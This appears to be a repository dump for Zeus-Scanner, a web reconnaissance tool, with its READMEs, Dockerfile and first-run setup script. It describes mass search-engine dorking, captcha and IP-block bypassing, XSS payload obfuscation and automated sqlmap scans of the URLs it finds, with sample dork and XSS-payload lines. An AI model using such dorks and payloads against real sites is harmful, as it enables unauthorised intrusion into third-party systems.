32 |
33 | ### What is Zeus?
34 |
35 | Zeus is an advanced reconnaissance utility designed to make web application reconnaissance simple. Zeus comes complete with a powerful built-in URL parsing engine, multiple search engine compatibility, the ability to extract URLs from both ban and webcache URLs, the ability to run multiple vulnerability assessments on the target, and the ability to bypass search engine captchas.
36 |
37 | ### Features
38 |
39 | - A powerful built-in URL parsing engine
40 | - Multiple search engine compatibility (`DuckDuckGo`, `AOL`, `Bing`, and `Google`; the default is `Google`)
41 | - Ability to extract the URL from Google's ban URL, thus bypassing IP blocks
42 | - Ability to extract from Google's webcache URL
43 | - Proxy compatibility (`http`, `https`, `socks4`, `socks5`)
44 | - Tor proxy compatibility and Tor browser emulation
45 | - Parse `robots.txt`/`sitemap.xml` and save them to a file
46 | - Multiple vulnerability assessments (XSS, SQLi, clickjacking, port scanning, admin panel finding, whois lookups, and more)
47 | - Tamper scripts to obfuscate XSS payloads
48 | - Can run with a custom default user-agent, one of over 4000 random user-agents, or a personal user-agent
49 | - Automatic issue creation when an unexpected error arises
50 | - Ability to crawl a webpage and pull all the links
51 | - Can run a singular dork, multiple dorks in a given file, or a random dork from a list of over 5000 carefully researched dorks
52 | - Dork blacklisting: when no sites are found with the search query, the query is saved to a blacklist file
53 | - Identify WAF/IPS/IDS protection of over 20 different firewalls
54 | - Header protection enumeration to check what kind of protection is provided via HTTP headers
55 | - Saving cookies, headers, and other vital information to log files
56 | - and much more...
57 |
58 | ### Screenshots
59 |
60 | Running without any mandatory options, or running the `--help` flag, will output Zeus's help menu:
61 | ![zeus-help](https://user-images.githubusercontent.com/14183473/30176257-63391c62-93c7-11e7-94d7-68fde7818381.png)
62 | A basic dork scan with the `-d` flag, from the given dork, will launch an automated browser and pull the Google page results:
63 | ![zeus-dork-scan](https://user-images.githubusercontent.com/14183473/30176252-618b191a-93c7-11e7-84d2-572c12994c4d.png)
64 | Calling the `-s` flag will prompt you to start the sqlmap API server (`python sqlmapapi.py -s`) from sqlmap; it will then connect to the API and perform a sqlmap scan on the found URLs.
65 | ![zeus-sqlmap-api](https://user-images.githubusercontent.com/14183473/30176259-6657b304-93c7-11e7-81f8-0ed09a6c0268.png)
66 |
67 | You can see more screenshots [here](https://github.com/Ekultek/Zeus-Scanner/wiki/Screenshots)
68 |
69 | ### Demo
70 |
71 | [Demo video](https://vimeo.com/239885768)
72 |
73 |
74 | ### Requirements
75 |
76 | There are some requirements for this to be run successfully.
77 |
78 | ##### Basic requirements
79 |
80 | - `libxml2-dev`, `libxslt1-dev`, `python-dev` are required for the installation process
81 | - The Firefox web browser is required as of now; you will need Firefox version `<=57 >=51` (between 51 and 57). Full functionality for other browsers will eventually be added.
82 | - If you want to run sqlmap through the URLs, you will need sqlmap somewhere on your system.
83 | - If you want to run a port scan using nmap on the URLs' IP addresses, you will need nmap on your system.
84 | - [Geckodriver](https://github.com/mozilla/geckodriver) is required to run the Firefox web browser and will be installed the first time you run. It will be added to your `/usr/bin` so that it can be run in your ENV PATH.
85 | - You must run as `sudo` the first time so that the driver can be added to your PATH; you may also need to run as `sudo` depending on your permissions. _NOTE:_ `Depending on permissions you may need to be sudo for any run involving the geckodriver`
86 | - `xvfb` is required by `pyvirtualdisplay`; it will be installed on your first run if it is not already installed
87 |
88 | ##### Python package requirements
89 |
90 | - The [selenium-webdriver](http://www.seleniumhq.org/projects/webdriver/) package is required to automate the web browser and bypass API calls.
91 | - The [requests](http://docs.python-requests.org/en/master/) package is required to connect to the URL and to the sqlmap API.
92 | - The [python-nmap](http://xael.org/pages/python-nmap-en.html) package is required to run nmap on the URLs' IP addresses
93 | - The [whichcraft](https://github.com/pydanny/whichcraft) package is required to check whether nmap and sqlmap are on your system if you want to use them
94 | - The [pyvirtualdisplay](https://pyvirtualdisplay.readthedocs.io/en/latest/) package is required to hide the browser display while finding the search URL
95 | - [lxml](https://lxml.readthedocs.io/en/latest/) is required to parse XML data for the sitemap and save it as such
96 | - [psutil](https://github.com/giampaolo/psutil) is required to search for running sqlmap API sessions
97 | - [beautifulsoup](https://www.crummy.com/software/BeautifulSoup/bs4/doc/) is required to pull all the HREF descriptor tags and parse the HTML into an easily workable syntax
98 |
99 | ### Installation
100 |
101 | You can download the latest [tar.gz](https://github.com/ekultek/zeus-scanner/tarball/master), the latest [zip](https://github.com/ekultek/zeus-scanner/zipball/master), or you can find the current stable release [here](https://github.com/Ekultek/Zeus-Scanner/releases). Alternatively, you can install the latest development version by following the instructions that best match your operating system:
102 |
103 | **_NOTE: (optional but highly advised)_** add sqlmap and nmap to your environment PATH by moving them to `/usr/bin` or by adding them to the PATH via terminal
104 |
105 | ##### Ubuntu/Debian
106 |
107 | ```
108 | sudo apt-get install libxml2-dev libxslt1-dev python-dev && git clone https://github.com/ekultek/zeus-scanner.git && cd zeus-scanner && sudo pip2 install -r requirements.txt && sudo python zeus.py
109 | ```
110 |
111 | ##### centOS
112 |
113 | ```
114 | sudo yum install gcc python-devel libxml2-devel libxslt-devel && git clone https://github.com/ekultek/zeus-scanner.git && cd zeus-scanner && sudo pip2 install -r requirements.txt && sudo python zeus.py
115 | ```
116 |
117 | ##### Others
118 |
119 | ```
120 | sudo apt-get install libxml2-dev libxslt1-dev python-dev && git clone https://github.com/ekultek/zeus-scanner.git && cd zeus-scanner && sudo pip2 install -r requirements.txt && sudo python zeus.py
121 | ```
122 |
123 | This will install all the package requirements along with the geckodriver
124 |
125 | ### Donations
126 |
127 | Zeus is created by a small team of developers that have an aspiration for information security and strive to succeed. If you like Zeus and want to donate to our funding, we gladly and appreciatively accept donations via:
128 |
129 | - Bitcoin (BTC): `3DAQGcAQ194NGVs16Mmv75ip45CVuE8cZy`
130 | - [PayPal](https://www.paypal.me/ZeusScanner)
131 | - Or you can [buy us a coffee](https://ko-fi.com/A28355P5)
132 |
133 | You can be assured that all donations will go towards Zeus funding to make it more reliable and even better; thank you from the Zeus development team
134 |
135 | ### Shoutouts
136 |
137 | ##### [OpenSource Projects](https://www.facebook.com/opensourceprojects/)
138 |
139 | OpenSource Projects is a Facebook community page whose goal is to give developers, new and old, an easy and simple place to share their opensource contributions and projects. I personally think this is an awesome idea; I know how hard it is to get your code noticed by people, and I support these guys 100%. Go ahead and give them a like [here](https://www.facebook.com/opensourceprojects/). They will share any opensource project you send them for free. Thank you OpenSource Projects for giving developers a place to share work with one another!
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | test.py
2 | log/
3 | geckodriver.log
4 | *.pyc
5 | .idea/
6 | bin/executed.txt
7 | bin/paths
8 | bin/version_info
9 | bin/__pycache__/
10 | lib/__pycache__/
11 | lib/attacks/__pycache__/
12 | lib/attacks/admin_panel_finder/__pycache__/
13 | etc/deprecated/intel_me/__pycache__/
14 | lib/attacks/nmap_scan/__pycache__/
15 | lib/attacks/sqlmap_scan/__pycache__/
16 | lib/attacks/whois_lookup/__pycache__/
17 | lib/attacks/xss_scan/__pycache__/
18 | lib/core/__pycache__/
19 | var/__pycache__/
20 | var/auto_issue/__pycache__/
21 | var/blackwidow/__pycache__/
22 | var/search/__pycache__/
--------------------------------------------------------------------------------
/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM ubuntu:18.10
2 |
3 | WORKDIR /app
4 |
5 | RUN apt update && \
6 |     apt install -y \
7 |     libxml2-dev \
8 |     libxslt1-dev \
9 |     libgtk-3-dev \
10 |     libdbus-glib-1-2 \
11 |     python-dev \
12 |     python-pip \
13 |     git \
14 |     curl \
15 |     nmap \
16 |     sqlmap \
17 |     xvfb \
18 |     && rm -rf /var/lib/apt/lists/*
19 |
20 | ARG GECKO_DRIVER_VERSION=0.23.0
21 | ARG FIREFOX_VERSION=58.0.2
22 |
23 | RUN git clone https://github.com/ekultek/zeus-scanner.git . && \
24 |     pip install -r requirements.txt
25 |
26 | RUN curl -L https://github.com/mozilla/geckodriver/releases/download/v${GECKO_DRIVER_VERSION}/geckodriver-v${GECKO_DRIVER_VERSION}-linux64.tar.gz | tar xz -C /usr/bin
27 |
28 | RUN curl -L https://ftp.mozilla.org/pub/firefox/releases/${FIREFOX_VERSION}/linux-$(uname -m)/en-US/firefox-${FIREFOX_VERSION}.tar.bz2 -o firefox.tar.bz2 && \
29 |     tar xjf firefox.tar.bz2 -C /opt && \
30 |     rm firefox.tar.bz2 && \
31 |     ln -s /opt/firefox/firefox /usr/bin/firefox
32 |
33 | CMD ["python", "zeus.py"]
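
# Example usage of this image (illustrative commands, not part of the original Dockerfile):
#   docker build -t zeus-scanner .
#   docker run --rm -it zeus-scanner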
34 |
35 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | **_NOTE: due to dumbass people, automatic issue creation has been turned off until further notice_**
2 |
3 | ----
4 |
5 | [](https://github.com/ekultek/zeus-scanner/stargazers)
6 | [](https://github.com/ekultek/zeus-scanner/network)
7 | [](https://github.com/ekultek/zeus-scanner/issues)
8 | [](https://raw.githubusercontent.com/Ekultek/Zeus-Scanner/master/.github/LICENSE.md)
9 | [](https://twitter.com/stay__salty)
10 | [](https://github.com/Ekultek/Zeus-Scanner#donations)
11 |
12 | # Helpful links directory
13 |
14 | - [Translations](https://github.com/Ekultek/Zeus-Scanner#translations)
15 | - [What is Zeus](https://github.com/Ekultek/Zeus-Scanner#zeus-scanner)
16 | - [Zeus's features](https://github.com/Ekultek/Zeus-Scanner#features)
17 | - [Requirements and installation](https://github.com/Ekultek/Zeus-Scanner#requirements)
18 |   - [Ubuntu/Debian](https://github.com/Ekultek/Zeus-Scanner#ubuntudebian)
19 |   - [centOS](https://github.com/Ekultek/Zeus-Scanner#centos)
20 |   - [Backbox](https://github.com/Ekultek/Zeus-Scanner#backbox)
21 |   - [other](https://github.com/Ekultek/Zeus-Scanner#others)
22 | - [Screenshots](https://github.com/Ekultek/Zeus-Scanner#screenshots)
23 | - [Demo video](https://vimeo.com/239885768)
24 | - [User manual](https://github.com/Ekultek/Zeus-Scanner/wiki)
25 |   - [How Zeus works](https://github.com/Ekultek/Zeus-Scanner/wiki/How-Zeus-works)
26 |   - [Functionality](https://github.com/Ekultek/Zeus-Scanner/wiki/Functionality)
27 |   - [Passing sqlmap flags with Zeus](https://github.com/Ekultek/Zeus-Scanner/wiki/Passing-flags-to-sqlmap)
28 | - [Legal information](https://github.com/Ekultek/Zeus-Scanner/tree/master/.github)
29 |   - [License (GPL)](https://github.com/Ekultek/Zeus-Scanner/blob/master/.github/LICENSE.md)
30 |   - [Code of conduct](https://github.com/Ekultek/Zeus-Scanner/blob/master/.github/CODE_OF_CONDUCT.md)
31 | - [Report a bug](https://github.com/Ekultek/Zeus-Scanner/issues/new)
32 | - [Open a pull request](https://github.com/Ekultek/Zeus-Scanner/compare)
33 | - [Contribution guidelines](https://github.com/Ekultek/Zeus-Scanner/blob/master/.github/CONTRIBUTING.md)
34 | - [Donations to Zeus](https://github.com/Ekultek/Zeus-Scanner#donations)
35 | - [Shoutouts](https://github.com/Ekultek/Zeus-Scanner#shoutouts)
36 |
37 | # Zeus-Scanner
38 |
39 | ### What is Zeus?
40 |
41 | Zeus is an advanced reconnaissance utility designed to make web application reconnaissance simple. Zeus comes complete with a powerful built-in URL parsing engine, multiple search engine compatibility, the ability to extract URLs from both ban and webcache URLs, the ability to run multiple vulnerability assessments on the target, and is able to bypass search engine captchas.
42 |
43 | ### Features
44 |
45 | - A powerful built-in URL parsing engine
46 | - Multiple search engine compatibility (`DuckDuckGo`, `AOL`, `Bing`, and `Google`; the default is `Google`)
47 | - Ability to extract the URL from Google's ban URL thus bypassing IP blocks
48 | - Ability to extract from Google's webcache URL
49 | - Proxy compatibility (`http`, `https`, `socks4`, `socks5`)
50 | - Tor proxy compatibility and Tor browser emulation
51 | - Parse `robots.txt`/`sitemap.xml` and save them to a file
52 | - Multiple vulnerability assessments (XSS, SQLi, clickjacking, port scanning, admin panel finding, whois lookups, and more)
53 | - Tamper scripts to obfuscate XSS payloads (see the sketch after this list)
54 | - Can run with a custom default user-agent, one of over 4000 random user-agents, or a personal user-agent
55 | - Automatic issue creation when an unexpected error arises
56 | - Ability to crawl a webpage and pull all the links
57 | - Can run a singular dork, multiple dorks in a given file, or a random dork from a list of over 5000 carefully researched dorks
58 | - Dork blacklisting: when no sites are found with the search query, the query is saved to a blacklist file
59 | - Identify WAF/IPS/IDS protection of over 20 different firewalls
60 | - Header protection enumeration to check what kind of protection is provided via HTTP headers
61 | - Saving cookies, headers, and other vital information to log files
62 | - and much more...
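
To make the tamper-script idea concrete, here is a minimal sketch in the spirit of `lib/tamper_scripts/base64_encode.py`. The `tamper(payload)` entry point is an assumption for illustration only, not the project's confirmed interface:

```
# Hypothetical tamper script -- not the project's actual code.
import base64

def tamper(payload):
    # base64-encode the XSS payload so naive keyword filters don't match it
    return base64.b64encode(payload.encode()).decode()

if __name__ == "__main__":
    print(tamper("<script>alert(1)</script>"))
```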
63 |
64 | ### Screenshots
65 |
66 | Running without any mandatory options, or running the `--help` flag, will output Zeus's help menu:
67 | ![zeus-help](https://user-images.githubusercontent.com/14183473/30176257-63391c62-93c7-11e7-94d7-68fde7818381.png)
68 | A basic dork scan with the `-d` flag, from the given dork, will launch an automated browser and pull the Google page results:
69 | ![zeus-dork-scan](https://user-images.githubusercontent.com/14183473/30176252-618b191a-93c7-11e7-84d2-572c12994c4d.png)
70 | Calling the `-s` flag will prompt you to start the sqlmap API server (`python sqlmapapi.py -s`) from sqlmap; it will then connect to the API and perform a sqlmap scan on the found URLs.
71 | ![zeus-sqlmap-api](https://user-images.githubusercontent.com/14183473/30176259-6657b304-93c7-11e7-81f8-0ed09a6c0268.png)
72 |
73 | You can see more screenshots [here](https://github.com/Ekultek/Zeus-Scanner/wiki/Screenshots)
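
For reference, the invocations implied by the screenshots above might look like this (a sketch; the dork string is illustrative):

```
python zeus.py --help                         # show the help menu
python zeus.py -d "inurl:index.php?id="       # run a dork scan with a given dork
python zeus.py -d "inurl:index.php?id=" -s    # dork scan, then sqlmap the found URLs via the API
```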
74 |
75 | ### Demo
76 |
77 | [Demo video](https://vimeo.com/239885768)
79 |
80 | ### Requirements
81 |
82 | There are some requirements for this to be run successfully.
83 |
84 | ##### Basic requirements
85 |
86 | - `libxml2-dev`, `libxslt1-dev`, `python-dev` are required for the installation process
87 | - The Firefox web browser is required as of now; you will need Firefox version `<=58 >=52` (between 52 and 58). Full functionality for other browsers will eventually be added.
88 | - If you want to run sqlmap through the URLs, you will need sqlmap somewhere on your system.
89 | - If you want to run a port scan using nmap on the URLs' IP addresses, you will need nmap on your system.
90 | - [Geckodriver](https://github.com/mozilla/geckodriver) is required to run the Firefox web browser and will be installed the first time you run. It will be added to your `/usr/bin` so that it can be run in your ENV PATH.
91 | - You must run as `sudo` the first time so that the driver can be added to your PATH; you also may need to run as `sudo` depending on your permissions. _NOTE:_ `Depending on permissions you may need to be sudo for any run involving the geckodriver`
92 | - `xvfb` is required by `pyvirtualdisplay`; it will be installed on your first run if it is not already installed
93 |
94 | ##### Python package requirements
95 |
96 | - [selenium-webdriver](http://www.seleniumhq.org/projects/webdriver/) package is required to automate the web browser and bypass API calls.
97 | - [requests](http://docs.python-requests.org/en/master/) package is required to connect to the URL, and the sqlmap API
98 | - [python-nmap](http://xael.org/pages/python-nmap-en.html) package is required to run nmap on the URL's IP addresses
99 | - [whichcraft](https://github.com/pydanny/whichcraft) package is required to check if nmap and sqlmap are on your system if you want to use them
100 | - [pyvirtualdisplay](https://pyvirtualdisplay.readthedocs.io/en/latest/) package is required to hide the browser display while finding the search URL
101 | - [lxml](https://lxml.readthedocs.io/en/latest/) is required to parse XML data for the sitemap and save it as such
102 | - [psutil](https://github.com/giampaolo/psutil) is required to search for running sqlmap API sessions
103 | - [beautifulsoup](https://www.crummy.com/software/BeautifulSoup/bs4/doc/) is required to pull all the HREF descriptor tags and parse the HTML into an easily workable syntax
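
Taken together, these map onto a requirements file along these lines (an illustrative sketch; the repository's actual requirements.txt contents are not shown in this document):

```
selenium
requests
python-nmap
whichcraft
pyvirtualdisplay
lxml
psutil
beautifulsoup4
```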
104 |
105 | ### Installation
106 |
107 | You can download the latest [tar.gz](https://github.com/ekultek/zeus-scanner/tarball/master), the latest [zip](https://github.com/ekultek/zeus-scanner/zipball/master), or you can find the current stable release [here](https://github.com/Ekultek/Zeus-Scanner/releases/tag/v1.5). Alternatively you can install the latest development version by following the instructions that best match your operating system:
108 |
109 | **_NOTE: (optional but highly advised)_** add sqlmap and nmap to your environment PATH by moving them to `/usr/bin` or by adding them to the PATH via terminal
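
For example (illustrative paths; adjust to wherever sqlmap and nmap actually live on your system):

```
sudo ln -s /opt/sqlmap/sqlmap.py /usr/bin/sqlmap
export PATH="$PATH:/opt/nmap"    # or extend PATH for the current shell session
```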
110 |
111 | ##### Ubuntu/Debian
112 |
113 | ```
114 | sudo apt-get install libxml2-dev libxslt1-dev python-dev && git clone https://github.com/ekultek/zeus-scanner.git && cd zeus-scanner && sudo pip2 install -r requirements.txt && sudo python zeus.py
115 | ```
116 |
117 | ##### centOS
118 |
119 | ```
120 | sudo yum install gcc python-devel libxml2-devel libxslt-devel && git clone https://github.com/ekultek/zeus-scanner.git && cd zeus-scanner && sudo pip2 install -r requirements.txt && sudo python zeus.py
121 | ```
122 |
123 | ##### Backbox
124 |
125 | 64 bit installation:
126 | ```
127 | sudo -s << EOF
128 | aptitude purge firefox
129 | wget https://ftp.mozilla.org/pub/firefox/releases/57.0/linux-x86_64/en-US/firefox-57.0.tar.bz2
130 | tar -xjf firefox-57.0.tar.bz2
131 | rm -rf /opt/firefox*
132 | mv firefox /opt/firefox57
133 | mv /usr/bin/firefox /usr/bin/firefoxold
134 | ln -s /opt/firefox57/firefox-bin /usr/bin/firefox
135 | apt-get install libxml2-dev libxslt1-dev python-dev && git clone https://github.com/ekultek/zeus-scanner.git && cd zeus-scanner && pip2 install -r requirements.txt && python zeus.py
136 | EOF
137 | ```
138 |
139 | 32 bit installation:
140 | ```
141 | sudo -s << EOF
142 | aptitude purge firefox
143 | wget https://ftp.mozilla.org/pub/firefox/releases/57.0/linux-i686/en-US/firefox-57.0.tar.bz2
144 | tar -xjf firefox-57.0.tar.bz2
145 | rm -rf /opt/firefox*
146 | mv firefox /opt/firefox57
147 | mv /usr/bin/firefox /usr/bin/firefoxold
148 | ln -s /opt/firefox57/firefox-bin /usr/bin/firefox
149 | apt-get install libxml2-dev libxslt1-dev python-dev && git clone https://github.com/ekultek/zeus-scanner.git && cd zeus-scanner && pip2 install -r requirements.txt && python zeus.py
150 | EOF
151 | ```
152 |
153 | ##### Others
154 |
155 | ```
156 | sudo apt-get install libxml2-dev libxslt1-dev python-dev && git clone https://github.com/ekultek/zeus-scanner.git && cd zeus-scanner && sudo pip2 install -r requirements.txt && sudo python zeus.py
157 | ```
158 |
159 | This will install all the package requirements along with the geckodriver
160 |
161 |
162 | ### Donations
163 |
164 | Zeus is created by a small team of developers that have an aspiration for information security and strive to succeed. If you like Zeus and want to donate to our funding, we gladly and appreciatively accept donations via:
165 |
166 | - Bitcoin(BTC): `3DAQGcAQ194NGVs16Mmv75ip45CVuE8cZy`
167 | - [PayPal](https://www.paypal.me/ZeusScanner)
168 | - Or you can [Buy us a coffee](https://ko-fi.com/A28355P5)
169 |
170 | You can be assured that all donations will go towards Zeus funding to make it more reliable and even better, thank you from the Zeus development team
171 |
172 | ### Shoutouts
173 |
174 | ##### [OpenSource Projects](https://www.facebook.com/opensourceprojects/)
175 |
176 | OpenSource Projects is a Facebook community page whose goal is to give developers, new and old, an easy and simple place to share their opensource contributions and projects. I personally think this is an awesome idea; I know how hard it is to get your code noticed by people, and I support these guys 100%. Go ahead and give them a like [here](https://www.facebook.com/opensourceprojects/). They will share any opensource project you send them for free. Thank you OpenSource Projects for giving developers a place to share work with one another!
177 |
178 |
179 | ### Translations
180 |
181 | - [Spanish](https://github.com/Ekultek/Zeus-Scanner/blob/master/.github/translations/README-spanish.md)
182 | - [Russian](https://github.com/Ekultek/Zeus-Scanner/blob/master/.github/translations/README-russian.md)
183 | - [French](https://github.com/Ekultek/Zeus-Scanner/blob/master/.github/translations/README-french.md)
184 |
--------------------------------------------------------------------------------
/bin/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ekultek/Zeus-Scanner/21b87563062326cd480669f2922f650173a2a18e/bin/__init__.py
--------------------------------------------------------------------------------
/bin/drivers/geckodriver-v0.17.0-linux32.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ekultek/Zeus-Scanner/21b87563062326cd480669f2922f650173a2a18e/bin/drivers/geckodriver-v0.17.0-linux32.tar.gz
--------------------------------------------------------------------------------
/bin/drivers/geckodriver-v0.17.0-linux64.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ekultek/Zeus-Scanner/21b87563062326cd480669f2922f650173a2a18e/bin/drivers/geckodriver-v0.17.0-linux64.tar.gz
--------------------------------------------------------------------------------
/bin/drivers/geckodriver-v0.18.0-linux32.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ekultek/Zeus-Scanner/21b87563062326cd480669f2922f650173a2a18e/bin/drivers/geckodriver-v0.18.0-linux32.tar.gz
--------------------------------------------------------------------------------
/bin/drivers/geckodriver-v0.18.0-linux64.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ekultek/Zeus-Scanner/21b87563062326cd480669f2922f650173a2a18e/bin/drivers/geckodriver-v0.18.0-linux64.tar.gz
--------------------------------------------------------------------------------
/bin/drivers/geckodriver-v0.19.0-linux32.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ekultek/Zeus-Scanner/21b87563062326cd480669f2922f650173a2a18e/bin/drivers/geckodriver-v0.19.0-linux32.tar.gz
--------------------------------------------------------------------------------
/bin/drivers/geckodriver-v0.19.0-linux64.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ekultek/Zeus-Scanner/21b87563062326cd480669f2922f650173a2a18e/bin/drivers/geckodriver-v0.19.0-linux64.tar.gz
--------------------------------------------------------------------------------
/bin/unzip_gecko.py:
--------------------------------------------------------------------------------
1 | import os
2 | import sys
3 | import time
4 | import shlex
5 | import platform
6 | import threading
7 | import subprocess
8 | import tarfile
9 | try:
10 | import ConfigParser # python 2
11 | except ImportError:
12 | import configparser as ConfigParser # python 3
13 |
14 | import whichcraft
15 |
16 | import lib.core.common
17 | import lib.core.settings
18 |
19 |
20 | stop_animation = False
21 | xvfb_path = "{}/etc/scripts/install_xvfb.sh".format(os.getcwd())
22 |
23 |
24 | def animation(text):
25 | global stop_animation
26 | i = 0
27 | while not stop_animation:
28 | temp_text = list(text)
29 | if i >= len(temp_text):
30 | i = 0
31 | temp_text[i] = temp_text[i].upper()
32 | temp_text = ''.join(temp_text)
33 | sys.stdout.write("\033[92m{}\r\033[0m".format(temp_text))
34 | sys.stdout.flush()
35 | i += 1
36 | time.sleep(0.1)
37 | else:
38 | pass
39 |
40 |
41 | def disclaimer():
42 | question = raw_input(
43 | "\033[91mAttacking targets without consent is not only illegal, but it "
44 | "is unethical and frowned upon in most countries. By installing this "
45 | "program you are agreeing that you are responsible for your own actions, "
46 | "you are over the age of 18 or legally considered an adult in your "
47 | "place of origin, and that you will obey all laws, regulations, and "
48 | "rules set forth by your place of origin. You will only see this disclaimer "
49 | "once. If you agree to the conditions type 'yes'...\033[0m"
50 | )
51 | if question.upper() == "YES":
52 | return True
53 | else:
54 | lib.core.settings.logger.fatal(lib.core.settings.set_color(
55 | "you have not agreed with the terms of service, so "
56 | "Zeus will shut down now", level=50
57 | ))
58 | return False
59 |
60 |
61 | def parse_hosts(filepath="/etc/hosts"):
62 | to_append = "127.0.0.1\tlocalhost"
63 | appended = False
64 | with open(filepath, "a+") as etc:
65 | for line in etc:
66 | if line.strip() == to_append:
67 | appended = True
68 | if not appended:
69 | etc.seek(0)
70 | etc.write(to_append + "\n")
71 |
72 |
73 | def find_tools(to_search=("sqlmap", "nmap"), directory="{}/bin/paths", filename="path_config.ini"):
74 | global stop_animation
75 |
76 | lib.core.settings.create_dir(directory.format(os.getcwd()))
77 | full_path = "{}/{}".format(
78 | directory.format(os.getcwd()),
79 | filename
80 | )
81 | cfgfile = open(full_path, "a+")
82 | parser = ConfigParser.ConfigParser()
83 | path_schema = {}
84 | for item in to_search:
85 | path_obj = whichcraft.which(item)
86 | if path_obj is not None:
87 | path_schema[item] = path_obj
88 | else:
89 | path_schema[item] = None
90 | for key, value in path_schema.items():  # items() works on both python 2 and 3
91 | if value is None:
92 | stop_animation = True
93 | print("\n")
94 | provided_path = lib.core.common.prompt(
95 | "what is the full path to {} on your system".format(key)
96 | )
97 | path_schema[key] = provided_path
98 | for program, path in path_schema.items():
99 | parser.add_section(program)
100 | parser.set(program, "path", path)
101 | parser.write(cfgfile)
102 | cfgfile.close()
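# the resulting bin/paths/path_config.ini ends up looking roughly like:
#   [sqlmap]
#   path = /usr/bin/sqlmap
#   [nmap]
#   path = /usr/bin/nmap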
103 |
104 |
105 | def config_gecko_version(browser_version):
106 | """
107 | figure out which gecko version you need
108 | """
109 | version_specs = {
110 | (57, 58): 19,
111 | (56, 55, 54): 18,
112 | (53, 52): 17
113 | }
114 | if isinstance(browser_version, (tuple, list, set)):
115 | major = browser_version[0]
116 | for key in version_specs.keys():
117 | for num in key:
118 | if num == major:
119 | return version_specs[key]
120 | else:
121 | if "." in browser_version:
122 | major = browser_version.split(".")[0]
123 | else:
124 | major = browser_version
125 | for key in version_specs.keys():
126 | for num in key:
127 | if num == int(major):
128 | return version_specs[key]
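# for reference, the mapping above resolves, e.g.:
#   config_gecko_version("57.0.2") -> 19  (geckodriver v0.19.0)
#   config_gecko_version((53, 0))  -> 17  (geckodriver v0.17.0)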
129 |
130 |
131 | def check_os(current=platform.platform()):
132 | """
133 | check the user's operating system
134 | """
135 | if "linux" in str(current).lower():
136 | return True
137 | return False
138 |
139 |
140 | def check_xvfb(exc="Xvfb"):
141 | """
142 | test for xvfb on the user's system
143 | """
144 | global xvfb_path
145 | global stop_animation
146 | if whichcraft.which(exc) is None:
147 | cmd = shlex.split("sudo sh {}".format(xvfb_path))
148 | subprocess.call(cmd)
149 | stop_animation = True
150 |
151 | else:
152 | return True
153 |
154 |
155 | def check_if_run(file_check="{}/bin/executed.txt"):
156 | """
157 | check if the application has been run before by reading the executed.txt file
158 | """
159 | if os.path.isfile(file_check.format(os.getcwd())):
160 | with open(file_check.format(os.getcwd())) as exc:
161 | if "FALSE" in exc.read():
162 | return True
163 | return False
164 | else:
165 | with open(file_check.format(os.getcwd()), "a+") as exc:
166 | exc.write("FALSE")
167 | return True
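# note: the sentinel file starts out holding FALSE and main() rewrites it to TRUE
# once setup succeeds, so this returns True exactly when first-run setup still needs to happen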
168 |
169 |
170 | def untar_gecko(filename="{}/bin/drivers/geckodriver-v0.{}.0-linux{}.tar.gz"):
171 | """
172 | untar the correct gecko driver for your computer architecture
173 | """
174 | global stop_animation
175 |
176 | arch_info = {"64bit": "64", "32bit": "32"}
177 | file_arch = arch_info[platform.architecture()[0]]
178 | ff_version = lib.core.settings.get_browser_version(output=False)
179 | if isinstance(ff_version, str) or ff_version is None:
180 | stop_animation = True
181 | ff_version = lib.core.common.prompt(
182 | "enter your firefox browser version (if you don't know it run firefox --version)"
183 | )
184 | gecko_version = config_gecko_version(ff_version)
185 | if gecko_version is None:
186 | stop_animation = True
187 | lib.core.settings.logger.fatal(lib.core.settings.set_color(
188 | "your current firefox version is not supported by Zeus", level=50
189 | ))
190 | lib.core.common.shutdown()
191 | gecko_full_filename = filename.format(os.getcwd(), gecko_version, file_arch)
192 | with open(lib.core.settings.GECKO_VERSION_INFO_PATH, "a+") as log:
193 | log.write(gecko_full_filename.split("/")[-1])
194 | tar = tarfile.open(filename.format(os.getcwd(), gecko_version, file_arch), "r:gz")
195 | try:
196 | tar.extractall("/usr/bin")
197 | except IOError as e:
198 | if "Text file busy" in str(e):
199 | tar.close()
200 | pass
201 | except Exception as e:
202 | if "[Errno 13] Permission denied: '/usr/bin/geckodriver'" in str(e):
203 | lib.core.settings.logger.exception(lib.core.settings.set_color(
204 | "first run must be ran as root (sudo python zeus.py)", level=50
205 | ))
206 | else:
207 | lib.core.settings.logger.exception(lib.core.settings.set_color(
208 | "ran into exception '{}', logged to current log file".format(e), level=50
209 | ))
210 | exit(-1)
211 | tar.close()
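# the driver is extracted straight into /usr/bin so selenium can find it on the PATH,
# which is also why the first run has to happen as root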
212 |
213 |
214 | def ensure_placed(item="geckodriver", verbose=False):
215 | """
216 | use whichcraft to ensure that the driver has been placed in your PATH variable
217 | """
218 | if not whichcraft.which(item):
219 | lib.core.settings.logger.fatal(lib.core.settings.set_color(
220 | "the executable '{}' does not appear to be in your /usr/bin PATH. "
221 | "please untar the correct geckodriver (if not already done) and move "
222 | "it to /usr/bin.".format(item), level=50
223 | ))
224 | exit(-1)
225 | else:
226 | return True
227 |
228 |
229 | def main(rewrite="{}/bin/executed.txt", verbose=False):
230 | """
231 | main method
232 | """
233 | if not check_os():
234 | raise NotImplementedError(lib.core.settings.set_color(
235 | "as of now, Zeus requires Linux to run successfully "
236 | "your current operating system '{}' is not implemented "
237 | "yet".format(platform.platform()), level=50
238 | ))
239 | if check_if_run():
240 | if not disclaimer():
241 | exit(1)
242 | t = threading.Thread(target=animation, args=(
243 | "seems this is your first time running the application, doing setup please wait..",))
244 | t.daemon = True
245 | t.start()
246 | find_tools()
247 | check_xvfb()
248 | untar_gecko()
249 | parse_hosts()
250 | if ensure_placed(verbose=verbose):
251 | with open(rewrite.format(os.getcwd()), "w") as rw:
252 | rw.write("TRUE")
253 | lib.core.settings.logger.info(lib.core.settings.set_color(
254 | "done, continuing process"
255 | ))
256 | else:
257 | pass
258 |
